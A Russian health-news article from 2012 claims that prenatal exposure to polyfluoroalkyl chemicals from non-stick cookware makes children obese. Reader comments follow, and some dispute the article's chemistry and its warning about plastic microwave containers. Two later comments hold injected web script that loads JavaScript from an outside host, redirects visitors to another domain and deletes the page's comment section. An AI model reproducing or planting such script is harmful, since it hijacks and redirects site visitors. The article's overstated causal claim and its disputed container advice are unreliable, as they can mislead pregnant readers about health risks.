Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Антипригарное покрытие сд...  >>  Антипригарное покрытие сделает вашего ребенка толстым
 
Обратная связь
 

Антипригарное покрытие сделает вашего ребенка толстым

Размер шрифта
17 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Если женщина во время беременности подвергается воздействию определенных химических веществ (полифторалкилов), то у ее ребенка будет ожирение.

антипригарное покрытие

Полифторалкилы используются для производства фторполимеров и входят в состав упаковочного материала, непромокаемой одежды, мебели и антипригарного покрытия на посуде. Они в большом количестве находятся в окружающей среде, поэтому люди часто подвергаются воздействию этих химических веществ. В частности, полифторалкилы обнаружены в сыворотке крови, грудном молоке и пуповинной крови.

Суть исследования

В ходе проведения исследования ученые проанализировали данные 450 женщин, которые родили девочек. Во время беременности женщины сдавали анализы крови на выявление полифторалкилов. В том или ином количестве данные химические вещества были обнаружены в крови всех беременных женщин.

Дочери женщин, которые во время беременности подвергались воздействию большого количества полифторалкилов, рождались с низким весом, но уже к 20 месяцам их вес превышал возрастную норму. По мнению ученых, данный факт свидетельствует о том, что в дальнейшем у девушек может развиться ожирение.

Результаты

Согласно результатам предыдущих исследований, полифторалкилы оказывают негативное влияние на развитие плода и ребенка. В исследованиях на мышах доказано, что воздействие полифторалкилов на беременных самок, приводит к повышению уровня инсулина и увеличению веса у потомства во взрослом состоянии. Полученные данные согласуются с результатами предыдущих исследований и свидетельствуют о том, что окружающая среда играет немаловажную роль в развитии ожирения и сахарного диабета, причем начальные изменения закладываются еще в раннем детстве.

Меры предосторожности

Для того чтобы снизить риск негативного воздействия полифторалкилов, беременным женщинам не рекомендуется использовать посуду с антипригарным покрытием. Вместо нее следует готовить пищу в эмалированной посуде или посуде из нержавеющей стали. Также не рекомендуется разогревать продукты в микроволновой печи в упаковке или пластиковых контейнерах, поскольку в них также содержатся эти вредные химические вещества.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

19 сентября 2012 в 16:12

Цитировать   |   Пожаловаться

Лучше учите химию и иностранный язык, если неадекватно переводите. НЕТ веществ таких "ПЕРФТОРАЛКИЛЫ". Название, написанное вами, означает не вещество, а только частицу его, радикал или заместитель, но никак не вещество в целом!

2 - Гость

19 сентября 2012 в 16:20

Цитировать   |   Пожаловаться

Вы пишете:" Также не рекомендуется разогревать продукты в микроволновой печи вупаковке или пластиковых контейнерах, поскольку в них также содержатсяэти вредные химические вещества."

Все полимерные контейнеры, использующиеся в быту - НЕ из полифторированных углеводородов (иначе они стоили бы безумных денег.) Дело в том, что фторопласты чрезвычайно сложны в обработке, не всякий мастер берется даже вырезать изделия из листов тефлона. А готовых изделий бытового назначения просто не существует!

И именно "полифторалкилов", как вы их называете по неграмотности, в полипропиленовых контейнерах просто не может быть в соответствии с технологией их производства.

3 - Гость

13 ноября 2012 в 15:21

Цитировать   |   Пожаловаться

ничего не понимаю, а в чем готовить в итоге?я у запуталась в этом мире.

Гость 13 ноября 2012 в 15:21
а в чем готовить в итоге?
Самыми безопасными признаны изделия из керамики, стекла. 

5 - Гость

14 мая 2014 в 17:43

Цитировать   |   Пожаловаться

Вы что, помешались на своей безопасности? Жизнь коротка и её можно посвятить более важным вещам. Все мы, в конце концов, всё равно сдохнем!

6 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как убраться на кухне за 10 секунд   Вы неправильно моете посуду   Как правильно загружать посудомоечную машину, чтобы экономить   6 главных ошибок при уборке дома  
14 сентября 2012Антипригарное покрытие сделает вашего ребенка толстым! 19 февраля 2013Мальчик с ожирением не станет мужчиной
 
05 декабря 2012Когда вы нервничаете, ваш ребенок толстеет 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
Неожиданные убийцы у вас на кухне
Туалет стерилен по сравнению с ЭТИМИ местам в вашем доме
Вы неправильно стираете! 12 ошибок

Тесты

1
Жиры, которые мы едим
Безопасна ли ваша кухня?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.